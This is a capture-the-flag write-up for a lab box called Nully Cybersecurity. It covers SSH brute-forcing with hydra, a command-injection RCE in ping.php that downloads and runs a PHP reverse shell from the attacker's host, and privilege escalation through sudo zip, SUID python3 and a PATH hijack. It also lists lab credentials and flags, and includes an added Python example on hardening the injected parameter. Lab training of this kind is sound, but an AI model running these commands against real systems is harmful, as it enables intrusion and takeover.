Last updated: 15 Apr 24 09:31:26 (UTC)

Write-Up NullyCybersecurityCTF

Nully-Cybersecurity

Introduction

By Lawcky 06/01/24

Story:

You are a Professional White Hat. Small company Nully Cybersecurity hired you to conduct a security test of their internal corporate systems.

Difficulty : easy-medium

Additional info:

Name: Nully Cybersecurity: 1
Release date: 6 Sep 2020
Author: laf3r
Series: Nully Cybersecurity

|NOTE| if you want to see all the scans, I won't copy them here as they would be way too voluminous; click here to see them


Rules


In this write-up

  • telnet for pop3
  • hydra
  • ffuf
  • zip (SUID exploit)
  • ssh (port forwarding)
  • RCE using a PHP file
  • writable path
  • ftp
  • pycrack

Write-Up Mail Server

first approach

hydra

sudo hydra -l bob -P nullycyber.dic ssh://192.168.1.35:2222/

bob:bobby1985


for faster enumeration we run linpeas.sh

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

nothing special stands out


Privilege escalation

sudo -l

this script can be run as my2user; since we can modify it, we append /bin/bash to it to get a shell as my2user

from there, zip can be run via sudo, which we can use to get root access

TF=$(mktemp -u)

sudo zip $TF /etc/hosts -T -TT 'sh #'


Write-Up Web Server

the IP of the web server is 172.17.0.3 (localhost)

curl 172.17.0.3

the man in charge of the website seems to be named oliver


Port Forwarding

to make things easier we create an SSH port forward from our machine to the web server that passes through the mail server

ssh -L 127.0.0.1:8088:172.17.0.2:80 bob@192.168.1.84 -p 2222

it worked!

FUZZING

ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://127.0.0.1:8088/FUZZ -fc 403


RCE

there is a remote code execution: the host parameter of ping/ping.php is passed to a shell, so a pipe after the host lets us append our own command
we upload a PHP reverse shell (Pentest Monkey), served from our machine with

python -m http.server 8000

then we request the following URLs through the forward

http://127.0.0.1:8088/ping/ping.php?host=172.17.0.1|wget%20http://172.17.0.5/monkey.php

http://127.0.0.1:8088/ping/ping.php?host=172.17.0.1|php%20monkey.php

we have a reverse shell
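the host value reaches a shell unmodified, so the pipe turns the rest of it into a second command. As an added illustration (not code from the box or from this write-up), here is that flawed pattern next to a validated, shell-free version; the function names and sample values are constructed:

```python
"""Why ping.php?host=<ip>|<cmd> became RCE, and how such a handler should be
written. Added example; names and sample inputs are constructed."""
import ipaddress
import re
import subprocess

# Constructed samples: a normal value and the injected shape seen in the write-up.
LEGIT_HOST = "172.17.0.1"
INJECTED_HOST = "172.17.0.1|wget http://172.17.0.5/monkey.php"

# RFC 1123 hostname label: letters, digits, hyphens; no leading/trailing hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


def vulnerable_cmdline(host: str) -> str:
    """The flawed pattern: user input pasted into a string that a shell parses.
    A '|' in host makes the remainder a second command."""
    return f"ping -c 1 {host}"


def shell_would_run(cmdline: str) -> list[str]:
    """Split on '|' the way /bin/sh would, to show how many commands execute."""
    return [seg.strip() for seg in cmdline.split("|")]


def validate_host(host: str) -> str:
    """Accept only an IP literal or a well-formed hostname; reject anything else.
    Shell metacharacters, spaces and leading '-' (option smuggling) all fail here."""
    if len(host) > 253:
        raise ValueError("host too long")
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(host):
        return host
    raise ValueError(f"invalid host: {host!r}")


def safe_ping_argv(host: str) -> list[str]:
    """Hardened form: the validated value is one argv element and no shell is involved.
    (In PHP the equivalent is filter_var()/escapeshellarg() with a fixed command.)"""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str) -> int:
    """Execute the hardened command without shell=True; returns the exit status."""
    return subprocess.run(safe_ping_argv(host), capture_output=True, timeout=10).returncode
```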


Privilege Escalation

find / -perm -u=s -type f 2>/dev/null

using the SUID python3 binary

python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

we get hold of oscar's files and find this password on his desktop

oscar:H53QfJcXNcur9xFGND3bkPlVlMYUrPyBp76o

we find this executable owned by root

this script calls the date command

Writable Path

we prepend a writable directory to PATH so that the date command resolves to a script of our own instead of /bin/date

export PATH=/tmp:$PATH

we create a script /tmp/date, made executable with chmod +x, containing:
/bin/bash

and we run the current-date executable

got root

7afc7a60ac389f8d5c6f8f7d0ec645da

got second flag


Write-Up Database

FTP

we connect as anonymous and find many hidden files, one of them a password-protected zip file

PyCrack

donald:HBRLoCZ0b9NEgh8vsECS

Privilege Escalation

Using DB exploit

6cb25d4789cdd7fa1624e6356e0d825b

third flag found